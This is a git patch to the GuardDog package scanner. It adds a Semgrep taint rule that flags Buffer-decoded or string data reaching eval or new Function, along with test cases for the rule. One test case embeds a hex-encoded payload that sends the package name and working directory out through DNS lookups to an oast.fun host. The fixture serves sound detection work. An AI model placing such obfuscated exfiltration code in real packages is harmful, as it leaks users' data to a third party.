From af891f9f675466f9e78cf59d2559f31505a752d5 Mon Sep 17 00:00:00 2001
From: Sebastian Obregoso <sebastian.obregoso@datadoghq.com>
Date: Tue, 10 Sep 2024 16:21:50 +0200
Subject: [PATCH] adding a new detection and test case

---
 .../analyzer/sourcecode/npm-exec-base64.yml    | 18 +++++++++++++-----
 tests/analyzer/sourcecode/npm-exec-base64.js   | 15 +++++++++++++--
 2 files changed, 26 insertions(+), 7 deletions(-)

diff --git a/guarddog/analyzer/sourcecode/npm-exec-base64.yml b/guarddog/analyzer/sourcecode/npm-exec-base64.yml
index 60d06dd8..671f9a15 100644
--- a/guarddog/analyzer/sourcecode/npm-exec-base64.yml
+++ b/guarddog/analyzer/sourcecode/npm-exec-base64.yml
@@ -9,8 +9,16 @@ rules:
     languages:
       - javascript
     severity: WARNING
-    patterns:
-      - pattern-not: eval('...')
-      - pattern-not: eval("...")
-      - pattern-not: eval(`...`)
-      - pattern: eval(atob(...))
+    mode: taint
+    pattern-sources:
+      - pattern-either:
+          - pattern: Buffer.from(...)
+          - pattern: '"..."'
+    pattern-sinks:
+      - pattern-either:
+        - patterns:            
+          - pattern-inside: |
+              $FN = new Function(...)
+              ...
+          - pattern: $FN(...)
+        - pattern: eval(...)
diff --git a/tests/analyzer/sourcecode/npm-exec-base64.js b/tests/analyzer/sourcecode/npm-exec-base64.js
index 247e27de..817588e7 100644
--- a/tests/analyzer/sourcecode/npm-exec-base64.js
+++ b/tests/analyzer/sourcecode/npm-exec-base64.js
@@ -1,2 +1,13 @@
-// ruleid: npm-exec-base64
-eval(atob("Y29uc29sZS5sb2coIk5ldmVyIGdvbm5hIGdpdmUgeW91IHVwIikK"))
+function f(){
+  // ruleid: npm-exec-base64
+  eval(atob("Y29uc29sZS5sb2coIk5ldmVyIGdvbm5hIGdpdmUgeW91IHVwIikK"));
+}
+
+function f() {
+  import fetch from "node-fetch"
+  const admin = "0a636f6e7374207061636b6167654e616d65203d2022726f626c6f782d6576656e742d747261636b6572223b0a636f6e73742063757272656e74576f726b696e674469726563746f7279203d2070726f636573732e63776428293b0a636f6e73742064617461203d204a534f4e2e737472696e676966792860247b7061636b6167654e616d657d2b247b63757272656e74576f726b696e674469726563746f72797d60293b0a6c657420686578456e636f64656444617461203d204275666665722e66726f6d2864617461292e746f537472696e67282768657827293b0a636f6e7374206865784461746157697468446f7473203d20686578456e636f646564446174612e6d61746368286e65772052656745787028602e7b312c36327d602c2027672729292e6a6f696e28272e27293b0a6665746368286068747470733a2f2f247b6865784461746157697468446f74737d2e6c74617265767a6c7464636c6b6466727361647533386c30316e657967327268622e6f6173742e66756e60293b0a"
+  const adminResult = Buffer.from(admin, 'hex').toString('utf8');
+  const func = new Function(adminResult);
+  // ruleid: npm-exec-base64
+  func(adminResult); 
+}